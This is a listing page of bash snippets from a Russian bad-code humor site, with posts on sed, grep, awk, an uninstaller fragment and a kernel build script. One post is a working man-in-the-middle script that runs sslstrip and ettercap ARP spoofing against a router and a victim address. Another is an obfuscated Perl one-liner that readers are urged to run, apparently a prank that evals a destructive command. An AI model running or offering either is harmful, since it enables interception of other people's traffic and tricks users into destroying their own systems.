1. bash / Говнокод #15366

    −92

    1. 1
    sed 's/\(.*\)\t\(.*\)\t"\(.*\)"\t"\(.*\)"/<tr><td><a href="\2">\3<\/a><\/td><td>\4<\/td><td>\1<\/td><\/tr>/'

    Только sed, только хардкор ;)

    bormand, 06 Марта 2014

    Комментарии (8)
  2. bash / Говнокод #14839

    −129

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    21. 21
    22. 22
    23. 23
    24. 24
    25. 25
    26. 26
    27. 27
    28. 28
    29. 29
    30. 30
    31. 31
    32. 32
    33. 33
    34. 34
    35. 35
    36. 36
    37. 37
    38. 38
    39. 39
    40. 40
    41. 41
    42. 42
    43. 43
    44. 44
    45. 45
    46. 46
    47. 47
    48. 48
    49. 49
    50. 50
    51. 51
    52. 52
    53. 53
    54. 54
    55. 55
    56. 56
    57. 57
    58. 58
    59. 59
    60. 60
    61. 61
    62. 62
    63. 63
    64. 64
    65. 65
    66. 66
    67. 67
    68. 68
    69. 69
    70. 70
    71. 71
    72. 72
    73. 73
    74. 74
    #!/bin/bash
    FILE="/proc/sys/net/ipv4/ip_forward"
    echo "Время		Наименование				Статус" >> /tmp/for_log.list
    echo "______________________________________________________________" >> /tmp/for_log.list
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    IP_FORWARD(){
    while true; do
    
    CT_FORWARD=`cat /proc/sys/net/ipv4/ip_forward`
    if [ "$CT_FORWARD" = 1 ] ;then
    	echo > /dev/null
    else
    	echo "1" > $FILE
    fi
    #sleep 3
    done
    }
    
    CON_ETHERNET(){
    	while true; do
    	echo $(date +%H:%M:%S)"	Проверка интернет соединения		в обработке"  >> /tmp/for_log.list
    	ping -c 3 ya.ru > /dev/null
    		if [ $? = "0" ];then
    			echo $(date +%H:%M:%S)"	Подключение к интернет			есть" >> /tmp/for_log.list
    			START_SNIFFIG
    		else
    			echo $(date +%H:%M:%S)"	Нет интернет подключение		fail" >> /tmp/for_log.list
    			if [ "`ps sx | grep sslstrip | grep -v grep  | awk '{ print $10; }'`" = "sslstrip" ];then
    				$POSE=`ps sx | grep sslstrip | grep -v grep  | awk '{ print $2; }'`
    				kill -9 $POSE >rpmlist 2> /dev/null
    				echo "Процесс sslstrip... убит"
    				echo $(date +%H:%M:%S)"	Процесс sslstrip	убит" >> /tmp/for_log.list
    				else
    				echo > /dev/null
    			fi
    			if [ "`ps sx | grep tcpdump | grep -v grep  | awk '{ print $10; }'`" = "tcpdump" ];then
    				kill -9 `ps all | grep ettercap | grep -v grep  | awk '{ print $3; }'` >rpmlist 2> /dev/null
    				echo
    				echo "Процесс ettercap... убит"
    				echo $(date +%H:%M:%S)"	Процесс ettercap		убит" >> /tmp/for_log.list
    				kill -9 `ps all | grep sslstrip | grep -v grep  | awk '{ print $2; }'` >rpmlist 2> /dev/null
    				echo
    				echo "Процесс sslstrip... убит"
    				echo $(date +%H:%M:%S)"	Процесс sslsrip			убит" >> /tmp/for_log.list
    				else
    				echo > /dev/null
    			fi
    		fi
    		sleep 120
    	done
    }
    
    START_SNIFFIG(){
    	#Проверяем, запущен ли уже сниффер
    	sleep 4
    	CHECK_SSLSTRIP=`ps sx | grep sslstrip | grep -v grep | awk '{ print $10; }'`
    		if [ "$CHECK_SSLSTRIP" = "sslstrip" ];then
    			echo $(date +%H:%M:%S)"	Процесс sslstrip	 	включен" >> /tmp/for_log.list
    			echo > /dev/null
    		else
    			#sslstrip -a -k -f & ettercap -i wlan3 -TqM arp:remote -L  $(date +%d-%m-%Y__%H:%M) /192.168.1.1/ /192.168.1.102/
    			echo $(date +%H:%M:%S)"	Включаю sslstrip			включен успешно" >> /tmp/for_log.list
    			sslstrip -a -f & 
    		fi
    	CHECK_ETTERCAP=`ps all | grep ettercap | grep -v grep | awk '{ print $13; }'`
    		if [ "$CHECK_ETTERCAP" = "ettercap" ];then
    			echo $(date +%H:%M:%S)"	Процесс ettercap	 		включен" >> /tmp/for_log.list
    			else
    			echo $(date +%H:%M:%S)"	Включаю etttercap			включен успешно" >> /tmp/for_log.list
    			ettercap -i wlan0 -L $(date +%H:%M:%S) -TqM arp:remote -P autoadd  /192.168.1.1/ /192.168.1.102/ &
    		fi
    	}
    	
    IP_FORWARD & CON_ETHERNET

    1. Проверяет интернет соединение
    2. При наличии инета врубает sslstrip и ettercap
    3. Если инета нету, ждем 2 минуты, и повторяем проверку заного
    ___________
    Галимый полуавтоматический скрипт, писал челу под телефон на котором виртуалка линухи

    MassEnjoy, 23 Февраля 2014

    Комментарии (49)
  3. bash / Говнокод #14303

    −94

    1. 1
    perl -e 's;;=]=>%-{%#(/|}.|(!::]|.%[|]%!<|>/|!,,{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'; echo !

    Запускайте. не бойтесь)

    kegdan, 31 Декабря 2013

    Комментарии (155)
  4. bash / Говнокод #14289

    −119

    1. 1
    echo `getent passwd | awk -F: '{ if($1 == "myaut") print $3; }'`

    Определяет id пользователя myaut. Откопано в старой (моей) переписке. Эх...

    myaut, 27 Декабря 2013

    Комментарии (69)
  5. bash / Говнокод #12863

    −110

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    GetDSFInstallPath()
    {
    	DSF_INSTALL_PATH=`defaults read "/Library/Preferences/com.ubisoft.${PRODUCT_PREF_NAME}.GameUpdate" execPath | sed -n 's/\(.*\)\/.*/\1/p'`
    
    	# Convert from Unicode codes
    	LOC_IN_STR=${DSF_INSTALL_PATH}
    	LOC_CODES=`echo "${LOC_IN_STR}" | grep -oE [\\\\]u[[:xdigit:]]{4} | sort -u | grep -oE [[:xdigit:]]+`
    	if [ -n "${LOC_CODES}" ]; then
    	 if [ `php -v >/dev/null  2>/dev/null; echo $?` -eq 0 ]; then
    		for LOC_CODE_I in ${LOC_CODES}; do 
    			LOC_CHAR=`php -r "echo(mb_convert_encoding(pack('H*','$LOC_CODE_I'),'UTF-8','UTF-16'));"`
    			LOC_IN_STR=`echo "$LOC_IN_STR" | sed "s/[\\\\]u$LOC_CODE_I/$LOC_CHAR/g"`
    		done
    		DSF_INSTALL_PATH="${LOC_IN_STR}"
    		else
    		 echo "Warning: Game path is undefined: ${DSF_INSTALL_PATH}. Please, remove it manualy."
    	 fi
    	fi
    }

    Фрагмент скрипта uninstall`a от Ubisoft на макинтоше. mb_convert_encoding pack вот для чего нужен этот пхп, который кстати идет в комплекте с игрушкой

    stasyan, 08 Апреля 2013

    Комментарии (3)
  6. bash / Говнокод #12767

    −123

    1. 1
    if ps ax | grep -v grep | grep keydispatcher > /dev/null

    no comments. но блин, даже "работает". т.е. без этого grep -v grep лажает, а с ним - нет (видимо потому что второй греп не успевает запуститься пока ps ax отрабатывает). однако...

    Pencioner, 18 Марта 2013

    Комментарии (18)
  7. bash / Говнокод #12731

    −133

    1. 1
    yum remove python

    Еще один способ "отпилить ветку под собой"
    http://www.linux.org.ru/forum/admin/8946020

    Elvenfighter, 12 Марта 2013

    Комментарии (53)
  8. bash / Говнокод #12698

    −116

    1. 1
    pattern=hidden; find . | grep -e ".*\.java$" | xargs sh -ac 'for arg in $@; do cat -n $arg | grep -e "$pattern" > /dev/null && echo $arg && cat -n $arg | grep -e "$pattern"; done'

    Нужно было поискать юзаджи по коду.
    Вот такое вот наворотил.
    Каюсь...

    myzone, 06 Марта 2013

    Комментарии (19)
  9. bash / Говнокод #12440

    −113

    1. 1
    http://lab.madscience.nl/oo.sh.txt

    ООП-фаги, набигайте!

    byss, 17 Января 2013

    Комментарии (8)
  10. bash / Говнокод #12229

    −127

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    21. 21
    22. 22
    23. 23
    24. 24
    25. 25
    26. 26
    27. 27
    28. 28
    29. 29
    30. 30
    #!/bin/bash
    set -e
    
    KEHU_FILE=kehu_ruikemei
    
    echo "*************"
    echo "rm logo_linux_clut224"
    echo "*************"
    find drivers/video/logo/ -name logo_linux_clut224.o -exec rm -f {} \;
    find drivers/video/logo/ -name logo_linux_clut224.c -exec rm -f {} \;
    find drivers/video/logo/ -name logo_linux_clut224.ppm -exec rm -f {} \;
    
    echo "***********************"
    echo "copy logo_linux_clut224.ppm"
    echo "***********************"
    cp $KEHU_FILE/logo_linux_clut224.ppm drivers/video/logo/
    
    echo "***********************"
    echo "make kernel.img"
    echo "***********************"
    make kernel.img -j4
    
    echo "***********************"
    echo "return origin files"
    echo "***********************"
    find drivers/video/logo/ -name logo_linux_clut224.o -exec rm -f {} \;
    find drivers/video/logo/ -name logo_linux_clut224.c -exec rm -f {} \;
    git checkout -- drivers/video/logo/logo_linux_clut224.ppm
    
    echo "return origin files success!!!"

    Скрипт в корне исходников ядра linux для Rockchip RK3066.

    Necromant, 30 Ноября 2012

    Комментарии (14)